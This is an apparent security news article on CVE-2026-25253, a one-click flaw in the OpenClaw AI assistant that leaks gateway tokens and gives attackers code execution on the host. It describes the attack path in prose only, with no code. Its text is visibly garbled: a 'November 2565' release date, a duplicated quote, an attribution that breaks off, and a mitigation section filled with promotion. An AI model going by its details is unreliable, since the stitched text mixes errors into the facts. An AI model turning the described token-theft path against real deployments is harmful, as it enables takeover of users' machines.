We have discovered a critical RCE vulnerability in OpenClaw. This open-source, decentralized, autonomous AI personal assistant works locally on user devices. This vulnerability, tracked as CVE-2026-25253, has a CVSS score of 8.8, which reflects its severity. This critical flaw was brought to light by Mav Levin, a founding security researcher at Depthfirst. It allows threat actors to run remote code after a single click on harmful URLs.
OpenClaw, which connects with platforms like WhatsApp and Telegram has received thousands of hits within days of its first public release back in November 2565. Its popularity is no more evident than in its main GitHub repository, which has grown to over 149,000 stars. Latest findings may be coming at the expense of user safety. This is no less true for those who have logged into the Control UI of any Moltbot deployment.
Nature of the Vulnerability
CVE-2026-25253 authentication bypass vulnerability, classified as a token exfiltration vulnerability leading to full gateway compromise. It enables harmful websites to run client-side JavaScript on victims’ browsers in order to access delicate authentication tokens. By clicking on a crafted link or visiting a malicious site, users may inadvertently send their tokens to an attacker-controlled server.
This attack is especially alarming since it subverts the security protections users would hope to find embedded in OpenClaw’s architecture. In the words of another main player in this research space, Peter Steinberger,
“Clicking a crafted link or visiting a malicious site can send the token to an attacker-controlled server. The attacker can then connect to the victim’s local gateway, modify config (sandbox, tool policies), and invoke privileged actions, achieving 1-click RCE.”
Once an attacker successfully exploits this vulnerability, the attacker has full access to the system. From there they can change settings and run commands as root on the host machine. Levin emphasized the direct consequences of this exploitation:
“The Control UI trusts gatewayUrl from the query string without validation and auto-connects on load, sending the stored gateway token in the WebSocket connect payload.”
Exploitation Mechanics
Performing node.invoke requests drastically increases the risk. The implications of this action are dire as it lets attackers gain operator-level access to the gateway API. This access provides them with the ability to make arbitrary changes and execute arbitrary code on the gateway host itself.
“This forces the agent to run commands directly on the host machine, not inside a Docker container.”
The good news is that the OpenClaw team has patched this vulnerability in version 2026.1.29, which was published on January 30, 2026. All users are urged to immediately upgrade their deployments to this version to reduce the risk posed by CVE-2026-25253.
Levin cautioned that existing defenses may not adequately protect users from this type of threat:
“It impacts any Moltbot deployment where a user has authenticated to the Control UI. The attacker gains operator-level access to the gateway API, enabling arbitrary config changes and code execution on the gateway host.”
Mitigation Measures
The development of OpenClaw continues, and anyone looking for an AI personal assistant that runs completely on their own terms should check it out. As Steinberger noted:
Despite the measures taken in the latest version, Levin cautioned that existing defenses may not adequately protect users from this type of threat:
“I would say the problem is those defenses (sandbox and safety guardrails) were designed to contain malicious actions of an LLM, as a result of prompt injection, for example. And users might think these defenses would protect from this vulnerability (or limit the blast radius), but they don’t.”
OpenClaw remains a powerful tool for users seeking an AI personal assistant that operates fully under their control. As Steinberger noted:
“OpenClaw is an open agent platform that runs on your machine and works from the chat apps you already use.”